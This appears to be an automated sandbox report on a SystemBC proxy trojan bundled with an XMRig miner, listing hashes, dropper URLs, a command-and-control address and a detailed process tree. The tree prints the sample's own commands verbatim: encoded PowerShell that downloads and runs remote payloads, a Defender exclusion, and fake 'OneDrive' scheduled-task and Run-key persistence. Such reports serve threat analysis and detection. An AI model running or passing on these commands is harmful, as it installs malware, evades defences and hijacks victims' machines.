systembc | d540f75897495102dd30eaa924623ac40415e8a716bdcbadf7d7c9a00feb5c97

Analysis

max time kernel
136s
max time network
139s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
04-05-2023 11:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

95KB
MD5

92e79e8ed958f7289702c96fe03de5a5
SHA1

e16dede58a351b4bcc4e7b973fdec6c3ec3e98ce
SHA256

d540f75897495102dd30eaa924623ac40415e8a716bdcbadf7d7c9a00feb5c97
SHA512

fa0225f2f28eefd066a4d803586f7edcd3416b05c64ee6070e3d55a327ba7d68d245b7f669975d9aa34d7edc3a585fe05e633a38dfa19469488c58e09b832943
SSDEEP

1536:BfbO0u8DiUPCrElGBWHNC68MVlPjgNJiWUex4bmR+w/Y2tKSG8xB2ncSVKC29m+l:VbEUPCrElGsHNC68MVlPjgNJiWUexfNh

Score

10^/10

systembc xmrig evasion miner persistence trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.23/file.png

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.23/o.png

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.23/r.png

Extracted

Family

systembc

185.161.248.16:4440

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs

Processes:

OneDrive.exeOneDrive.exe

description	pid	process	target process
PID 1456 created 1312	1456	OneDrive.exe	Explorer.EXE
PID 1456 created 1312	1456	OneDrive.exe	Explorer.EXE
PID 1456 created 1312	1456	OneDrive.exe	Explorer.EXE
PID 844 created 1312	844	OneDrive.exe	Explorer.EXE
PID 844 created 1312	844	OneDrive.exe	Explorer.EXE
PID 844 created 1312	844	OneDrive.exe	Explorer.EXE
PID 844 created 1312	844	OneDrive.exe	Explorer.EXE

SystemBC
SystemBC is a proxy and remote administration tool first seen in 2019.
trojan systembc
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

dllhost.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ dllhost.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	dllhost.exe

XMRig Miner payload 11 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/844-157-0x000000013FCB0000-0x000000014067A000-memory.dmp	xmrig
behavioral1/memory/2040-183-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2040-189-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2040-195-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2040-198-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2040-202-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2040-206-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2040-210-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2040-214-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2040-218-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2040-223-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig

Blocklisted process makes network request 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow pid process

5 576 powershell.exe
6 1768 powershell.exe
7 1764 powershell.exe
10 576 powershell.exe
11 576 powershell.exe
Downloads MZ/PE file

flow	pid	process
5	576	powershell.exe
6	1768	powershell.exe
7	1764	powershell.exe
10	576	powershell.exe
11	576	powershell.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

dllhost.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	dllhost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	dllhost.exe

Executes dropped EXE 5 IoCs

Processes:

OneDrive.exedllhost.exelsass.exeOneDrive.exelsass.exe

pid process

1456 OneDrive.exe
1736 dllhost.exe
1004 lsass.exe
844 OneDrive.exe
1860 lsass.exe
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

dllhost.exe

description ioc process

Key opened \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Wine dllhost.exe
Loads dropped DLL 3 IoCs

Processes:

powershell.exetaskeng.exelsass.exe

pid process

576 powershell.exe
1160 taskeng.exe
1004 lsass.exe

pid	process
1456	OneDrive.exe
1736	dllhost.exe
1004	lsass.exe
844	OneDrive.exe
1860	lsass.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Wine	dllhost.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

lsass.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\lsass\\lsass.exe"	lsass.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs

Processes:

dllhost.exelsass.exelsass.exe

pid process

1736 dllhost.exe
1004 lsass.exe
1004 lsass.exe
1860 lsass.exe
1860 lsass.exe
1860 lsass.exe
1860 lsass.exe
1860 lsass.exe
1860 lsass.exe

pid	process
1736	dllhost.exe
1004	lsass.exe
1004	lsass.exe
1860	lsass.exe
1860	lsass.exe
1860	lsass.exe
1860	lsass.exe
1860	lsass.exe
1860	lsass.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

OneDrive.exe

description	pid	process	target process
PID 844 set thread context of 1880	844	OneDrive.exe	conhost.exe
PID 844 set thread context of 2040	844	OneDrive.exe	conhost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

1476 schtasks.exe
2040 schtasks.exe
1680 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

936 timeout.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

lsass.exe

pid process

1860 lsass.exe

pid	process
1476	schtasks.exe
2040	schtasks.exe
1680	schtasks.exe

pid	process
936	timeout.exe

pid	process
1860	lsass.exe

Suspicious behavior: EnumeratesProcesses 27 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeOneDrive.exepowershell.exedllhost.exeOneDrive.exepowershell.exe

pid	process
576	powershell.exe
876	powershell.exe
1764	powershell.exe
1768	powershell.exe
576	powershell.exe
576	powershell.exe
1456	OneDrive.exe
1456	OneDrive.exe
1456	OneDrive.exe
1456	OneDrive.exe
576	powershell.exe
576	powershell.exe
1544	powershell.exe
1736	dllhost.exe
1456	OneDrive.exe
1456	OneDrive.exe
576	powershell.exe
576	powershell.exe
844	OneDrive.exe
844	OneDrive.exe
844	OneDrive.exe
844	OneDrive.exe
1832	powershell.exe
844	OneDrive.exe
844	OneDrive.exe
844	OneDrive.exe
844	OneDrive.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

464

pid	process
464

Suspicious use of AdjustPrivilegeToken 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.execonhost.exelsass.exelsass.exe

description	pid	process
Token: SeDebugPrivilege	576	powershell.exe
Token: SeDebugPrivilege	876	powershell.exe
Token: SeDebugPrivilege	1764	powershell.exe
Token: SeDebugPrivilege	1768	powershell.exe
Token: SeShutdownPrivilege	700	powercfg.exe
Token: SeDebugPrivilege	1544	powershell.exe
Token: SeShutdownPrivilege	1236	powercfg.exe
Token: SeShutdownPrivilege	1384	powercfg.exe
Token: SeShutdownPrivilege	1880	powercfg.exe
Token: SeShutdownPrivilege	1672	powercfg.exe
Token: SeShutdownPrivilege	1516	powercfg.exe
Token: SeDebugPrivilege	1832	powershell.exe
Token: SeShutdownPrivilege	536	powercfg.exe
Token: SeShutdownPrivilege	580	powercfg.exe
Token: SeLockMemoryPrivilege	2040	conhost.exe
Token: SeLockMemoryPrivilege	2040	conhost.exe
Token: SeDebugPrivilege	1004	lsass.exe
Token: SeDebugPrivilege	1860	lsass.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

conhost.exe

pid	process
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

conhost.exe

pid	process
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe
2040	conhost.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

lsass.exelsass.exe

pid process

1004 lsass.exe
1860 lsass.exe

pid	process
1004	lsass.exe
1860	lsass.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

file.exepowershell.execmd.exepowershell.exetaskeng.execmd.exepowershell.exeOneDrive.exelsass.exe

description	pid	process	target process
PID 1584 wrote to memory of 876	1584	file.exe	powershell.exe
PID 1584 wrote to memory of 876	1584	file.exe	powershell.exe
PID 1584 wrote to memory of 876	1584	file.exe	powershell.exe
PID 1584 wrote to memory of 1768	1584	file.exe	powershell.exe
PID 1584 wrote to memory of 1768	1584	file.exe	powershell.exe
PID 1584 wrote to memory of 1768	1584	file.exe	powershell.exe
PID 1584 wrote to memory of 576	1584	file.exe	powershell.exe
PID 1584 wrote to memory of 576	1584	file.exe	powershell.exe
PID 1584 wrote to memory of 576	1584	file.exe	powershell.exe
PID 1584 wrote to memory of 1764	1584	file.exe	powershell.exe
PID 1584 wrote to memory of 1764	1584	file.exe	powershell.exe
PID 1584 wrote to memory of 1764	1584	file.exe	powershell.exe
PID 576 wrote to memory of 1456	576	powershell.exe	OneDrive.exe
PID 576 wrote to memory of 1456	576	powershell.exe	OneDrive.exe
PID 576 wrote to memory of 1456	576	powershell.exe	OneDrive.exe
PID 576 wrote to memory of 1736	576	powershell.exe	dllhost.exe
PID 576 wrote to memory of 1736	576	powershell.exe	dllhost.exe
PID 576 wrote to memory of 1736	576	powershell.exe	dllhost.exe
PID 576 wrote to memory of 1736	576	powershell.exe	dllhost.exe
PID 1016 wrote to memory of 700	1016	cmd.exe	powercfg.exe
PID 1016 wrote to memory of 700	1016	cmd.exe	powercfg.exe
PID 1016 wrote to memory of 700	1016	cmd.exe	powercfg.exe
PID 1016 wrote to memory of 1236	1016	cmd.exe	powercfg.exe
PID 1016 wrote to memory of 1236	1016	cmd.exe	powercfg.exe
PID 1016 wrote to memory of 1236	1016	cmd.exe	powercfg.exe
PID 1016 wrote to memory of 1384	1016	cmd.exe	powercfg.exe
PID 1016 wrote to memory of 1384	1016	cmd.exe	powercfg.exe
PID 1016 wrote to memory of 1384	1016	cmd.exe	powercfg.exe
PID 1016 wrote to memory of 1880	1016	cmd.exe	powercfg.exe
PID 1016 wrote to memory of 1880	1016	cmd.exe	powercfg.exe
PID 1016 wrote to memory of 1880	1016	cmd.exe	powercfg.exe
PID 1544 wrote to memory of 2040	1544	powershell.exe	schtasks.exe
PID 1544 wrote to memory of 2040	1544	powershell.exe	schtasks.exe
PID 1544 wrote to memory of 2040	1544	powershell.exe	schtasks.exe
PID 576 wrote to memory of 1004	576	powershell.exe	lsass.exe
PID 576 wrote to memory of 1004	576	powershell.exe	lsass.exe
PID 576 wrote to memory of 1004	576	powershell.exe	lsass.exe
PID 576 wrote to memory of 1004	576	powershell.exe	lsass.exe
PID 1160 wrote to memory of 844	1160	taskeng.exe	OneDrive.exe
PID 1160 wrote to memory of 844	1160	taskeng.exe	OneDrive.exe
PID 1160 wrote to memory of 844	1160	taskeng.exe	OneDrive.exe
PID 1512 wrote to memory of 1672	1512	cmd.exe	powercfg.exe
PID 1512 wrote to memory of 1672	1512	cmd.exe	powercfg.exe
PID 1512 wrote to memory of 1672	1512	cmd.exe	powercfg.exe
PID 1512 wrote to memory of 1516	1512	cmd.exe	powercfg.exe
PID 1512 wrote to memory of 1516	1512	cmd.exe	powercfg.exe
PID 1512 wrote to memory of 1516	1512	cmd.exe	powercfg.exe
PID 1512 wrote to memory of 536	1512	cmd.exe	powercfg.exe
PID 1512 wrote to memory of 536	1512	cmd.exe	powercfg.exe
PID 1512 wrote to memory of 536	1512	cmd.exe	powercfg.exe
PID 1832 wrote to memory of 1680	1832	powershell.exe	schtasks.exe
PID 1832 wrote to memory of 1680	1832	powershell.exe	schtasks.exe
PID 1832 wrote to memory of 1680	1832	powershell.exe	schtasks.exe
PID 1512 wrote to memory of 580	1512	cmd.exe	powercfg.exe
PID 1512 wrote to memory of 580	1512	cmd.exe	powercfg.exe
PID 1512 wrote to memory of 580	1512	cmd.exe	powercfg.exe
PID 844 wrote to memory of 1880	844	OneDrive.exe	conhost.exe
PID 844 wrote to memory of 2040	844	OneDrive.exe	conhost.exe
PID 1004 wrote to memory of 1476	1004	lsass.exe	schtasks.exe
PID 1004 wrote to memory of 1476	1004	lsass.exe	schtasks.exe
PID 1004 wrote to memory of 1476	1004	lsass.exe	schtasks.exe
PID 1004 wrote to memory of 1476	1004	lsass.exe	schtasks.exe
PID 1004 wrote to memory of 1860	1004	lsass.exe	lsass.exe
PID 1004 wrote to memory of 1860	1004	lsass.exe	lsass.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1312

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:1584

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:876

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:576

C:\Users\Admin\AppData\Roaming\OneDrive.exe
"C:\Users\Admin\AppData\Roaming\OneDrive.exe"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1456

C:\Users\Admin\AppData\Roaming\dllhost.exe
"C:\Users\Admin\AppData\Roaming\dllhost.exe"
4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1736

C:\Users\Admin\AppData\Roaming\lsass.exe
"C:\Users\Admin\AppData\Roaming\lsass.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1004

C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 13:14 /du 23:59 /sc daily /ri 1 /f
5⤵
- Creates scheduled task(s)
PID:1476

C:\ProgramData\lsass\lsass.exe
"C:\ProgramData\lsass\lsass.exe"
5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1860

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpDBB0.tmp.bat""
5⤵
PID:1576

C:\Windows\SysWOW64\timeout.exe
timeout 7
6⤵
- Delays execution with timeout.exe
PID:936

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1768

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1764

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1544

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'
3⤵
- Creates scheduled task(s)
PID:2040

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:1016

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:700

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1236

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1384

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1880

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "OneDrive"
2⤵
PID:940

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1832

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'
3⤵
- Creates scheduled task(s)
PID:1680

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:1512

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1516

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:536

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:580

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
2⤵
PID:1880

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2040

C:\Windows\system32\taskeng.exe
taskeng.exe {F7113E20-63A3-4384-81A5-862A8DC28CCA} S-1-5-21-3499517378-2376672570-1134980332-1000:MLXLFKOI\Admin:Interactive:[1]
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1160

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:844

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1672

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\lsass\lsass.exe

Filesize
1.7MB

MD5
eb85c562249e96d7a946111241f0ea4b

SHA1
5c89db5dad53c26ec1f8189261a7fc4eace18773

SHA256
95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8

SHA512
ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

Download Submit
C:\ProgramData\lsass\lsass.exe

Filesize
1.7MB

MD5
eb85c562249e96d7a946111241f0ea4b

SHA1
5c89db5dad53c26ec1f8189261a7fc4eace18773

SHA256
95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8

SHA512
ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpDBB0.tmp.bat

Filesize
154B

MD5
7a55f4e0f7e01ecf5f08e1c7e7f28bd4

SHA1
83eb80089d5cc00735644947fcc3986d437d2535

SHA256
a9d1d25edcca21b7f6c411245b0b5b6c1ee4d4841307880e74de7a06ae338c29

SHA512
19c2e561daa88185f657e2ab93dfa90678dd8aac61ca817adca1ec9b489633a5d727647c50a4268404539a872280c35dafafc35e35b258bb60c778c1fc471b17

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpDBB0.tmp.bat

Filesize
154B

MD5
7a55f4e0f7e01ecf5f08e1c7e7f28bd4

SHA1
83eb80089d5cc00735644947fcc3986d437d2535

SHA256
a9d1d25edcca21b7f6c411245b0b5b6c1ee4d4841307880e74de7a06ae338c29

SHA512
19c2e561daa88185f657e2ab93dfa90678dd8aac61ca817adca1ec9b489633a5d727647c50a4268404539a872280c35dafafc35e35b258bb60c778c1fc471b17

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4Y2JHVI9TRNJEQWVOYRI.temp

Filesize
7KB

MD5
781c3c16134f528d2a21882b21b2aa5b

SHA1
